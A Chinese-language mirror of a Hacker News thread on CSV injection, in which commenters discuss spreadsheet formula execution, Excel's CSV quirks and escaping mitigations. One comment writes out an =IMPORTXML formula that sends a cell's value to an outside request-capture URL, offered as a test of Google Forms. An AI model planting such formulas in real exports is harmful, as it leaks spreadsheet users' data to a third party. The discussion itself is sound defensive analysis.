TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Dangers of CSV Injection

645 点作者 rpenm超过 7 年前

24 条评论

Dylan16807超过 7 年前
&gt; Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.<p>&gt;Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.<p>The documented way is prefixing with a &#x27; character. It doesn&#x27;t have the length issue either.<p>As to the root issue, I can&#x27;t think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don&#x27;t. At some point, something is going to have to guess.
评论 #15440097 未加载
评论 #15439298 未加载
评论 #15439586 未加载
评论 #15440429 未加载
评论 #15439561 未加载
评论 #15440649 未加载
pavel_lishin超过 7 年前
Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see &quot;CSV&quot; and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, <i>and also get exported as such</i>.<p>So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains &quot;1.23456E+11&quot;, which is worse than useless.
评论 #15442165 未加载
评论 #15442188 未加载
评论 #15442936 未加载
评论 #15442555 未加载
评论 #15443177 未加载
评论 #15464429 未加载
datenwolf超过 7 年前
The thing that puzzles me the most is, that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band-signalling and a contextual grammar.<p>ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:<p>x01 SOH &quot;Start of Heading&quot;<p>x02 STX &quot;Start of Text&quot;<p>x03 ETX &quot;End of Text&quot;<p>x04 EOT &quot;End of Transmission&quot;<p>x1C FS &quot;File Separator&quot;<p>x1D GS &quot;Group Separator&quot;<p>x1E RS &quot;Record Separator&quot;<p>x1F US &quot;Unit Separator&quot;<p>You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII&#x2F;UTF-8 without control codes you can just dump anything without the need for escaping or quoting.<p>So my suggestion is simple. Don&#x27;t use CSV or &quot;P&quot;SV (printable separated values). Use ASV (ASCII separated values).
评论 #15441171 未加载
评论 #15440840 未加载
评论 #15441157 未加载
评论 #15441706 未加载
评论 #15441154 未加载
评论 #15443733 未加载
评论 #15451187 未加载
bitexploder超过 7 年前
I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:<p>CSV -&gt; import on web app -&gt; SQLi<p>Malicious input -&gt; CSV download from web app -&gt; Excel -&gt; formula -&gt; sneaky data exfil<p>CSV -&gt; JS -&gt; import into web app XSS (in places no other XSS existed because of the data)<p>CSV import -&gt; weird CSV header -&gt; arbitrary data loading (headers were column names.... Schema injection .. like SQLi only more hilarious<p>Point is apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.
评论 #15439512 未加载
评论 #15440044 未加载
kristofferR超过 7 年前
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).<p>To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it&#x27;s a shame so many apps&#x2F;services only export CSV files. Many developers (mainly US&#x2F;UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.
评论 #15439362 未加载
评论 #15439441 未加载
评论 #15440206 未加载
评论 #15439550 未加载
评论 #15439422 未加载
splike超过 7 年前
Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.<p>[1] <a href="https:&#x2F;&#x2F;genomebiology.biomedcentral.com&#x2F;articles&#x2F;10.1186&#x2F;s13059-016-1044-7" rel="nofollow">https:&#x2F;&#x2F;genomebiology.biomedcentral.com&#x2F;articles&#x2F;10.1186&#x2F;s13...</a>
评论 #15442269 未加载
评论 #15441831 未加载
评论 #15440901 未加载
jkabrg超过 7 年前
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?<p>Some things I dislike about CSV:<p>* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.<p>* I&#x27;m not a fan of the empty field. Pandas thinks it&#x27;s a floating point NaN, while R doesn&#x27;t. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don&#x27;t Know? Maybe it should be removed altogether.<p>* No agreement about escape characters.<p>* No agreement about separator characters.<p>* No agreement about line endings.<p>* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?<p>* None of the choices above are made explicit in the file itself. They all have the same extension &quot;CSV&quot;.<p>These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.<p>Good things: * Human readable. * Simple.<p>I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.
评论 #15442142 未加载
评论 #15444588 未加载
评论 #15443936 未加载
评论 #15443957 未加载
fulafel超过 7 年前
This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.<p>Why would these apps go off executing code from a text file? How odd.<p>Is there a way to tell Excel or Sheets to open a CSV file without executing code?
评论 #15439691 未加载
评论 #15439685 未加载
评论 #15442562 未加载
top_post超过 7 年前
Sorry to balk, but I&#x27;m more outraged at the title, another injection I need to talk about that isn&#x27;t really the case. The root cause is the interpreter executing untrusted input, the same can be said about macros or any other file type. The perception being most people open CSV files on a regular basis and perceive them to be safe or not interpreted when it appears they are.
评论 #15439411 未加载
Cyranix超过 7 年前
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.<p><a href="https:&#x2F;&#x2F;bugcrowd.com&#x2F;socrata" rel="nofollow">https:&#x2F;&#x2F;bugcrowd.com&#x2F;socrata</a><p>(But please, just do me a small favor and don&#x27;t submit any reports for SQL injection or information disclosure if you&#x27;re using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)
Swizec超过 7 年前
This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.<p>Makes me wanna troll ops people at my own startup just for funsies.
评论 #15439272 未加载
Mortiffer超过 7 年前
Incase anyone else was wondering about Google Forms : I tried inputting =IMPORTXML(CONCAT(&quot;<a href="https:&#x2F;&#x2F;requestb.in&#x2F;15z4vk51?f=&quot;,H8" rel="nofollow">https:&#x2F;&#x2F;requestb.in&#x2F;15z4vk51?f=&quot;,H8</a>),&quot;&#x2F;&#x2F;a&quot;) into a text field and google automatically appends a &quot;&#x27;&quot; such that &#x27;=IMPORTXML does not execute
jaclaz超过 7 年前
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.<p>A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the &quot;import wizard&quot; set the appropriate separator and set all columns as &quot;text&quot;.
captn3m0超过 7 年前
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:<p>&gt;CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it&#x27;s rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing&#x2F;interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.<p>[0]: <a href="https:&#x2F;&#x2F;sites.google.com&#x2F;site&#x2F;bughunteruniversity&#x2F;nonvuln&#x2F;csv-excel-formula-injection" rel="nofollow">https:&#x2F;&#x2F;sites.google.com&#x2F;site&#x2F;bughunteruniversity&#x2F;nonvuln&#x2F;cs...</a><p>Their policy makes it sound like that the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all)
jonnycomputer超过 7 年前
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications&#x27; consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
filereaper超过 7 年前
I&#x27;d be curious if anyone has hit exploits with CSV files and bulk ingestion into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.<p>CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...<p>A lot of old legacy systems know CSV and its easy to inspect visually as compares to more efficient binary formats like ORC or Paquet.
tatersolid超过 7 年前
Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over over with bugs and inconsistencies for all time.<p>Use anything else, even XLSX which is at least a typed and openly standardized format.
stepri超过 7 年前
When you import a CSV file into Google Sheets (File -&gt; Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (&#x27;) before the function.
ecesena超过 7 年前
Does anybody know any good library that solve the problem, in any language?
ComodoHacker超过 7 年前
My Excel 2010 doesn&#x27;t execute shell code from author&#x27;s example. Heck, it doesn&#x27;t even parse CSV and loads everything into one column as text. What am I doing wrong?
评论 #15440506 未加载
评论 #15441091 未加载
TAForObvReasons超过 7 年前
CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd&#x2F;mm&#x2F;yyyy or mm&#x2F;dd&#x2F;yyyy ?). The &quot;standard&quot; RFC4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.
评论 #15439360 未加载
评论 #15439397 未加载
评论 #15440005 未加载
评论 #15439377 未加载
评论 #15439324 未加载
beached_whale超过 7 年前
Excel protects for this, at least mine does v2013
评论 #15441955 未加载
jasonmaydie超过 7 年前
Shouldn&#x27;t this be the dangers of Excel? CSVs are benine
hutch120超过 7 年前
Little Bobby Tables reminds us to sanitize our database inputs.<p><a href="https:&#x2F;&#x2F;imgs.xkcd.com&#x2F;comics&#x2F;exploits_of_a_mom.png" rel="nofollow">https:&#x2F;&#x2F;imgs.xkcd.com&#x2F;comics&#x2F;exploits_of_a_mom.png</a>
评论 #15440515 未加载